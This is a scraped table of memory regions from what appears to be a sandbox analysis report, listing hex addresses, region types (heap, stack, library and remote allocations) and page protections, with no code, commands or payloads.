4AAA000
|
heap
|
page read and write
|
||
|
291C4047000
|
heap
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
258FE4B2000
|
heap
|
page read and write
|
||
|
4DAF000
|
heap
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
4C7F000
|
stack
|
page read and write
|
||
|
934000
|
heap
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
951000
|
heap
|
page read and write
|
||
|
291C3FED000
|
heap
|
page read and write
|
||
|
291C3EBE000
|
heap
|
page read and write
|
||
|
291C2232000
|
heap
|
page read and write
|
||
|
258FE24E000
|
heap
|
page read and write
|
||
|
258FE2FD000
|
heap
|
page read and write
|
||
|
72AD000
|
heap
|
page read and write
|
||
|
291C4047000
|
heap
|
page read and write
|
||
|
4BBB000
|
heap
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
258E42F2000
|
heap
|
page read and write
|
||
|
211BB000
|
heap
|
page read and write
|
||
|
4BE5000
|
heap
|
page read and write
|
||
|
2D2E000
|
unkown
|
page read and write
|
||
|
291C3E88000
|
heap
|
page read and write
|
||
|
258FE307000
|
heap
|
page read and write
|
||
|
258E4426000
|
heap
|
page read and write
|
||
|
4DA0000
|
trusted library allocation
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
5409000
|
trusted library allocation
|
page read and write
|
||
|
49DE000
|
heap
|
page read and write
|
||
|
874000
|
heap
|
page read and write
|
||
|
2E30000
|
trusted library allocation
|
page read and write
|
||
|
9D0000
|
direct allocation
|
page read and write
|
||
|
2DEA000
|
heap
|
page read and write
|
||
|
6EFE000
|
stack
|
page read and write
|
||
|
211BA000
|
heap
|
page read and write
|
||
|
76B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B310000
|
trusted library allocation
|
page read and write
|
||
|
258E7DA6000
|
trusted library allocation
|
page read and write
|
||
|
6E7E000
|
stack
|
page read and write
|
||
|
50FB000
|
heap
|
page read and write
|
||
|
291C219C000
|
heap
|
page read and write
|
||
|
4BC6000
|
heap
|
page read and write
|
||
|
87D0000
|
direct allocation
|
page read and write
|
||
|
74B0000
|
trusted library allocation
|
page read and write
|
||
|
258E6642000
|
trusted library allocation
|
page read and write
|
||
|
258FE54A000
|
heap
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
2C1E000
|
stack
|
page read and write
|
||
|
8780000
|
direct allocation
|
page read and write
|
||
|
291C3FF3000
|
heap
|
page read and write
|
||
|
2DEB000
|
heap
|
page read and write
|
||
|
4BA4000
|
heap
|
page read and write
|
||
|
35EE000
|
heap
|
page read and write
|
||
|
7680000
|
trusted library allocation
|
page read and write
|
||
|
21143000
|
heap
|
page read and write
|
||
|
8860000
|
direct allocation
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
212F6000
|
unclassified section
|
page execute and read and write
|
||
|
71AE000
|
stack
|
page read and write
|
||
|
4B0A000
|
trusted library allocation
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
7FFB4B290000
|
trusted library allocation
|
page read and write
|
||
|
4BB7000
|
heap
|
page read and write
|
||
|
479E000
|
stack
|
page read and write
|
||
|
875000
|
heap
|
page read and write
|
||
|
7630000
|
trusted library allocation
|
page read and write
|
||
|
291C3EA2000
|
heap
|
page read and write
|
||
|
8430000
|
heap
|
page read and write
|
||
|
584000
|
stack
|
page read and write
|
||
|
2109A000
|
heap
|
page read and write
|
||
|
258E42B1000
|
heap
|
page read and write
|
||
|
45B1000
|
heap
|
page read and write
|
||
|
291C4080000
|
heap
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
45B0000
|
heap
|
page read and write
|
||
|
2DEB000
|
heap
|
page read and write
|
||
|
7338000
|
heap
|
page read and write
|
||
|
291C401D000
|
heap
|
page read and write
|
||
|
874000
|
heap
|
page read and write
|
||
|
235B4170000
|
heap
|
page read and write
|
||
|
489E000
|
stack
|
page read and write
|
||
|
929D3FF000
|
stack
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
291C405F000
|
heap
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
291C3F98000
|
heap
|
page read and write
|
||
|
4BAB000
|
heap
|
page read and write
|
||
|
8416000
|
heap
|
page read and write
|
||
|
291C4015000
|
heap
|
page read and write
|
||
|
4BA3000
|
heap
|
page read and write
|
||
|
B20000
|
heap
|
page readonly
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
235B3E50000
|
heap
|
page read and write
|
||
|
291C40D0000
|
heap
|
page read and write
|
||
|
4622000
|
heap
|
page read and write
|
||
|
291C21DD000
|
heap
|
page read and write
|
||
|
8457000
|
heap
|
page read and write
|
||
|
51E9000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B370000
|
trusted library allocation
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
BC0000
|
trusted library allocation
|
page read and write
|
||
|
291C40D1000
|
heap
|
page read and write
|
||
|
258E4180000
|
heap
|
page read and write
|
||
|
5301000
|
heap
|
page read and write
|
||
|
4AA1000
|
heap
|
page read and write
|
||
|
4810000
|
heap
|
page read and write
|
||
|
4BA1000
|
heap
|
page read and write
|
||
|
80B7000
|
stack
|
page read and write
|
||
|
20C7F000
|
stack
|
page read and write
|
||
|
864E000
|
stack
|
page read and write
|
||
|
909000
|
heap
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
755E000
|
stack
|
page read and write
|
||
|
21021000
|
heap
|
page read and write
|
||
|
7FFB4B0B0000
|
trusted library allocation
|
page read and write
|
||
|
7660000
|
trusted library allocation
|
page read and write
|
||
|
291C3E95000
|
heap
|
page read and write
|
||
|
212FC000
|
unclassified section
|
page execute and read and write
|
||
|
258E4400000
|
trusted library allocation
|
page read and write
|
||
|
33E0000
|
heap
|
page read and write
|
||
|
2D10000
|
trusted library section
|
page read and write
|
||
|
291C4029000
|
heap
|
page read and write
|
||
|
4BF9000
|
heap
|
page read and write
|
||
|
4819000
|
heap
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
20E91000
|
heap
|
page read and write
|
||
|
291C21B6000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
59B1000
|
trusted library allocation
|
page read and write
|
||
|
258E5F01000
|
trusted library allocation
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
4CFB2FF000
|
stack
|
page read and write
|
||
|
4C06000
|
heap
|
page read and write
|
||
|
45B1000
|
heap
|
page read and write
|
||
|
59D9000
|
trusted library allocation
|
page read and write
|
||
|
4ED9000
|
heap
|
page read and write
|
||
|
4EE9000
|
heap
|
page read and write
|
||
|
4BAF000
|
heap
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
722E000
|
stack
|
page read and write
|
||
|
874000
|
heap
|
page read and write
|
||
|
258E7F1A000
|
trusted library allocation
|
page read and write
|
||
|
258E5C40000
|
trusted library allocation
|
page read and write
|
||
|
2DEA000
|
heap
|
page read and write
|
||
|
33B0000
|
heap
|
page readonly
|
||
|
80E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2E0000
|
trusted library allocation
|
page read and write
|
||
|
620000
|
heap
|
page read and write
|
||
|
4BAF000
|
heap
|
page read and write
|
||
|
291C403F000
|
heap
|
page read and write
|
||
|
20DF6000
|
direct allocation
|
page execute and read and write
|
||
|
2C5D000
|
stack
|
page read and write
|
||
|
A70000
|
heap
|
page read and write
|
||
|
9F0000
|
direct allocation
|
page read and write
|
||
|
20D3E000
|
stack
|
page read and write
|
||
|
871D000
|
stack
|
page read and write
|
||
|
875000
|
heap
|
page read and write
|
||
|
258E63B3000
|
trusted library allocation
|
page read and write
|
||
|
74D0000
|
heap
|
page execute and read and write
|
||
|
4BA9000
|
heap
|
page read and write
|
||
|
45B0000
|
heap
|
page read and write
|
||
|
7650000
|
trusted library allocation
|
page read and write
|
||
|
21279000
|
unclassified section
|
page execute and read and write
|
||
|
888000
|
heap
|
page read and write
|
||
|
291C400E000
|
heap
|
page read and write
|
||
|
258E67A8000
|
trusted library allocation
|
page read and write
|
||
|
4BA1000
|
heap
|
page read and write
|
||
|
291C3F81000
|
heap
|
page read and write
|
||
|
291C3EA2000
|
heap
|
page read and write
|
||
|
F32F0BE000
|
stack
|
page read and write
|
||
|
8F3000
|
heap
|
page read and write
|
||
|
4BA1000
|
heap
|
page read and write
|
||
|
72A7000
|
heap
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
291C21BD000
|
heap
|
page read and write
|
||
|
54FF000
|
stack
|
page read and write
|
||
|
258E6783000
|
trusted library allocation
|
page read and write
|
||
|
49DE000
|
heap
|
page read and write
|
||
|
2E76000
|
heap
|
page read and write
|
||
|
47FE000
|
stack
|
page read and write
|
||
|
20E90000
|
heap
|
page read and write
|
||
|
258E640D000
|
trusted library allocation
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
45B1000
|
heap
|
page read and write
|
||
|
291C2340000
|
remote allocation
|
page read and write
|
||
|
4EE4000
|
heap
|
page read and write
|
||
|
2D9D000
|
heap
|
page read and write
|
||
|
874000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
4BC2000
|
heap
|
page read and write
|
||
|
20C3C000
|
stack
|
page read and write
|
||
|
45C1000
|
heap
|
page read and write
|
||
|
C1E000
|
stack
|
page read and write
|
||
|
291C3E9E000
|
heap
|
page read and write
|
||
|
291C3FBA000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
874000
|
heap
|
page read and write
|
||
|
258FE340000
|
heap
|
page execute and read and write
|
||
|
258E4420000
|
heap
|
page read and write
|
||
|
670000
|
heap
|
page read and write
|
||
|
496E000
|
stack
|
page read and write
|
||
|
4BAB000
|
heap
|
page read and write
|
||
|
7FFB4B260000
|
trusted library allocation
|
page read and write
|
||
|
258E43C0000
|
heap
|
page read and write
|
||
|
880000
|
heap
|
page read and write
|
||
|
52F8000
|
trusted library allocation
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
81E0000
|
trusted library allocation
|
page read and write
|
||
|
929C5FA000
|
stack
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
312C000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
F32FB0E000
|
stack
|
page read and write
|
||
|
2DEB000
|
heap
|
page read and write
|
||
|
5300000
|
heap
|
page read and write
|
||
|
291C218F000
|
heap
|
page read and write
|
||
|
4BA1000
|
heap
|
page read and write
|
||
|
800000
|
heap
|
page readonly
|
||
|
929C8FE000
|
stack
|
page read and write
|
||
|
7FFB4B250000
|
trusted library allocation
|
page read and write
|
||
|
291C220F000
|
heap
|
page read and write
|
||
|
35D8000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
4BA1000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
81B0000
|
heap
|
page read and write
|
||
|
404F000
|
remote allocation
|
page execute and read and write
|
||
|
4BC9000
|
heap
|
page read and write
|
||
|
7FFB4B350000
|
trusted library allocation
|
page read and write
|
||
|
A40000
|
heap
|
page read and write
|
||
|
57F000
|
stack
|
page read and write
|
||
|
258FE240000
|
heap
|
page read and write
|
||
|
258E42F0000
|
heap
|
page read and write
|
||
|
A40000
|
heap
|
page read and write
|
||
|
999F000
|
direct allocation
|
page execute and read and write
|
||
|
235B4165000
|
heap
|
page read and write
|
||
|
258E7E24000
|
trusted library allocation
|
page read and write
|
||
|
20DCB000
|
unclassified section
|
page execute and read and write
|
||
|
291C3EA2000
|
heap
|
page read and write
|
||
|
21020000
|
heap
|
page read and write
|
||
|
258E4279000
|
heap
|
page read and write
|
||
|
291C4150000
|
heap
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
93D000
|
heap
|
page read and write
|
||
|
511E000
|
heap
|
page read and write
|
||
|
291C4031000
|
heap
|
page read and write
|
||
|
291C400E000
|
heap
|
page read and write
|
||
|
4FFB000
|
heap
|
page read and write
|
||
|
6EBA000
|
stack
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
4BB4000
|
heap
|
page read and write
|
||
|
4AA0000
|
heap
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
4BB4000
|
heap
|
page read and write
|
||
|
A60000
|
heap
|
page read and write
|
||
|
7FFB4B1BA000
|
trusted library allocation
|
page read and write
|
||
|
258E4430000
|
trusted library allocation
|
page read and write
|
||
|
75E8000
|
trusted library allocation
|
page read and write
|
||
|
258FE474000
|
heap
|
page read and write
|
||
|
291C21B7000
|
heap
|
page read and write
|
||
|
211EB000
|
heap
|
page read and write
|
||
|
291C3FED000
|
heap
|
page read and write
|
||
|
4BA8000
|
heap
|
page read and write
|
||
|
45B8000
|
heap
|
page read and write
|
||
|
2C10000
|
heap
|
page read and write
|
||
|
235B3EEB000
|
heap
|
page read and write
|
||
|
258E6129000
|
trusted library allocation
|
page read and write
|
||
|
716E000
|
stack
|
page read and write
|
||
|
2DEA000
|
heap
|
page read and write
|
||
|
45B1000
|
heap
|
page read and write
|
||
|
74C0000
|
trusted library allocation
|
page read and write
|
||
|
258F5F10000
|
trusted library allocation
|
page read and write
|
||
|
212A0000
|
unclassified section
|
page execute and read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
929CEFB000
|
stack
|
page read and write
|
||
|
291C2158000
|
heap
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
F32E873000
|
stack
|
page read and write
|
||
|
911000
|
heap
|
page read and write
|
||
|
544F000
|
remote allocation
|
page execute and read and write
|
||
|
BB0000
|
trusted library allocation
|
page read and write
|
||
|
291C3FBA000
|
heap
|
page read and write
|
||
|
291C3FFE000
|
heap
|
page read and write
|
||
|
5353000
|
trusted library allocation
|
page read and write
|
||
|
291C3E9A000
|
heap
|
page read and write
|
||
|
840000
|
direct allocation
|
page read and write
|
||
|
258FE750000
|
heap
|
page read and write
|
||
|
7362000
|
heap
|
page read and write
|
||
|
7FFB4B1A0000
|
trusted library allocation
|
page read and write
|
||
|
45BD000
|
heap
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
49B1000
|
trusted library allocation
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
258E4360000
|
heap
|
page read and write
|
||
|
291C3FCD000
|
heap
|
page read and write
|
||
|
291C4032000
|
heap
|
page read and write
|
||
|
291C2180000
|
heap
|
page read and write
|
||
|
7FFB4B2F0000
|
trusted library allocation
|
page read and write
|
||
|
291C4020000
|
heap
|
page read and write
|
||
|
81C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
291C415B000
|
heap
|
page read and write
|
||
|
258F61FE000
|
trusted library allocation
|
page read and write
|
||
|
258E426F000
|
heap
|
page read and write
|
||
|
8484000
|
heap
|
page read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
291C403F000
|
heap
|
page read and write
|
||
|
258E5F88000
|
trusted library allocation
|
page read and write
|
||
|
258E42F6000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
4BD8000
|
heap
|
page read and write
|
||
|
7FFB4B2B0000
|
trusted library allocation
|
page read and write
|
||
|
20BBC000
|
stack
|
page read and write
|
||
|
874000
|
heap
|
page read and write
|
||
|
291C3E85000
|
heap
|
page read and write
|
||
|
874000
|
heap
|
page read and write
|
||
|
2E4F000
|
heap
|
page read and write
|
||
|
291C4051000
|
heap
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
7FFB4B300000
|
trusted library allocation
|
page read and write
|
||
|
291C4020000
|
heap
|
page read and write
|
||
|
582000
|
stack
|
page read and write
|
||
|
291C401D000
|
heap
|
page read and write
|
||
|
235B4160000
|
heap
|
page read and write
|
||
|
566000
|
stack
|
page read and write
|
||
|
79C000
|
stack
|
page read and write
|
||
|
87C0000
|
direct allocation
|
page read and write
|
||
|
291C405A000
|
heap
|
page read and write
|
||
|
F32EAFC000
|
stack
|
page read and write
|
||
|
7FFB4B0BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
291C3FCD000
|
heap
|
page read and write
|
||
|
4DA0000
|
trusted library allocation
|
page read and write
|
||
|
4BC2000
|
heap
|
page read and write
|
||
|
492E000
|
stack
|
page read and write
|
||
|
2E18000
|
trusted library allocation
|
page read and write
|
||
|
4BAB000
|
heap
|
page read and write
|
||
|
20F08000
|
heap
|
page read and write
|
||
|
4DA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2A0000
|
trusted library allocation
|
page read and write
|
||
|
291C3FB4000
|
heap
|
page read and write
|
||
|
291C4047000
|
heap
|
page read and write
|
||
|
C1E000
|
stack
|
page read and write
|
||
|
291C4159000
|
heap
|
page read and write
|
||
|
291C3FFE000
|
heap
|
page read and write
|
||
|
258FE28C000
|
heap
|
page read and write
|
||
|
258E5EF0000
|
heap
|
page execute and read and write
|
||
|
291C3FCD000
|
heap
|
page read and write
|
||
|
258E4380000
|
heap
|
page read and write
|
||
|
291C2070000
|
heap
|
page read and write
|
||
|
7FFB4B0E6000
|
trusted library allocation
|
page execute and read and write
|
||
|
86D0000
|
trusted library allocation
|
page read and write
|
||
|
291C3FF1000
|
heap
|
page read and write
|
||
|
3813000
|
heap
|
page read and write
|
||
|
4BF9000
|
heap
|
page read and write
|
||
|
4BA1000
|
heap
|
page read and write
|
||
|
7FFB4B000000
|
trusted library allocation
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
2095D000
|
stack
|
page read and write
|
||
|
B6E000
|
stack
|
page read and write
|
||
|
4BA1000
|
heap
|
page read and write
|
||
|
291C2390000
|
heap
|
page read and write
|
||
|
45B1000
|
heap
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
20DE1000
|
direct allocation
|
page execute and read and write
|
||
|
7FFB4B1E2000
|
trusted library allocation
|
page read and write
|
||
|
2ADD000
|
stack
|
page read and write
|
||
|
874000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
291C3FEE000
|
heap
|
page read and write
|
||
|
7FFB4B1D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D7D000
|
stack
|
page read and write
|
||
|
291C4081000
|
heap
|
page read and write
|
||
|
727E000
|
heap
|
page read and write
|
||
|
258E4440000
|
heap
|
page readonly
|
||
|
819E000
|
stack
|
page read and write
|
||
|
F32EDBE000
|
stack
|
page read and write
|
||
|
690000
|
heap
|
page readonly
|
||
|
874000
|
heap
|
page read and write
|
||
|
76D0000
|
trusted library allocation
|
page read and write
|
||
|
BB0000
|
heap
|
page read and write
|
||
|
759E000
|
stack
|
page read and write
|
||
|
2D88000
|
heap
|
page read and write
|
||
|
7DF4C8000000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B1C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
291C21CA000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
7FFB4B2C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B120000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BAD000
|
heap
|
page read and write
|
||
|
4DA0000
|
trusted library allocation
|
page read and write
|
||
|
235B4164000
|
heap
|
page read and write
|
||
|
71EE000
|
stack
|
page read and write
|
||
|
B70000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
56B000
|
stack
|
page read and write
|
||
|
9A0000
|
direct allocation
|
page read and write
|
||
|
87B0000
|
direct allocation
|
page read and write
|
||
|
A39F000
|
direct allocation
|
page execute and read and write
|
||
|
258E42AF000
|
heap
|
page read and write
|
||
|
258E7800000
|
trusted library allocation
|
page read and write
|
||
|
BD0000
|
heap
|
page read and write
|
||
|
4BC3000
|
heap
|
page read and write
|
||
|
906000
|
heap
|
page read and write
|
||
|
258FE250000
|
heap
|
page read and write
|
||
|
4BC2000
|
heap
|
page read and write
|
||
|
906000
|
heap
|
page read and write
|
||
|
4BA1000
|
heap
|
page read and write
|
||
|
33C0000
|
heap
|
page read and write
|
||
|
2F3C000
|
heap
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
291C40FF000
|
heap
|
page read and write
|
||
|
2D59000
|
trusted library allocation
|
page read and write
|
||
|
291C3FA6000
|
heap
|
page read and write
|
||
|
2D50000
|
trusted library allocation
|
page read and write
|
||
|
76E0000
|
trusted library allocation
|
page read and write
|
||
|
291C40FF000
|
heap
|
page read and write
|
||
|
75E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B280000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B360000
|
trusted library allocation
|
page read and write
|
||
|
20D7F000
|
stack
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
870000
|
direct allocation
|
page read and write
|
||
|
F32F13B000
|
stack
|
page read and write
|
||
|
7FFB4B200000
|
trusted library allocation
|
page read and write
|
||
|
291C40D0000
|
heap
|
page read and write
|
||
|
90A000
|
heap
|
page read and write
|
||
|
7FFB4B270000
|
trusted library allocation
|
page read and write
|
||
|
45C1000
|
heap
|
page read and write
|
||
|
2121E000
|
heap
|
page read and write
|
||
|
45C8000
|
heap
|
page read and write
|
||
|
235B3EE0000
|
heap
|
page read and write
|
||
|
4BAF000
|
heap
|
page read and write
|
||
|
291C3E83000
|
heap
|
page read and write
|
||
|
4BA9000
|
heap
|
page read and write
|
||
|
291C402D000
|
heap
|
page read and write
|
||
|
258FE370000
|
heap
|
page read and write
|
||
|
929C9FE000
|
stack
|
page read and write
|
||
|
8830000
|
direct allocation
|
page read and write
|
There are 922 hidden memdumps, click here to show them.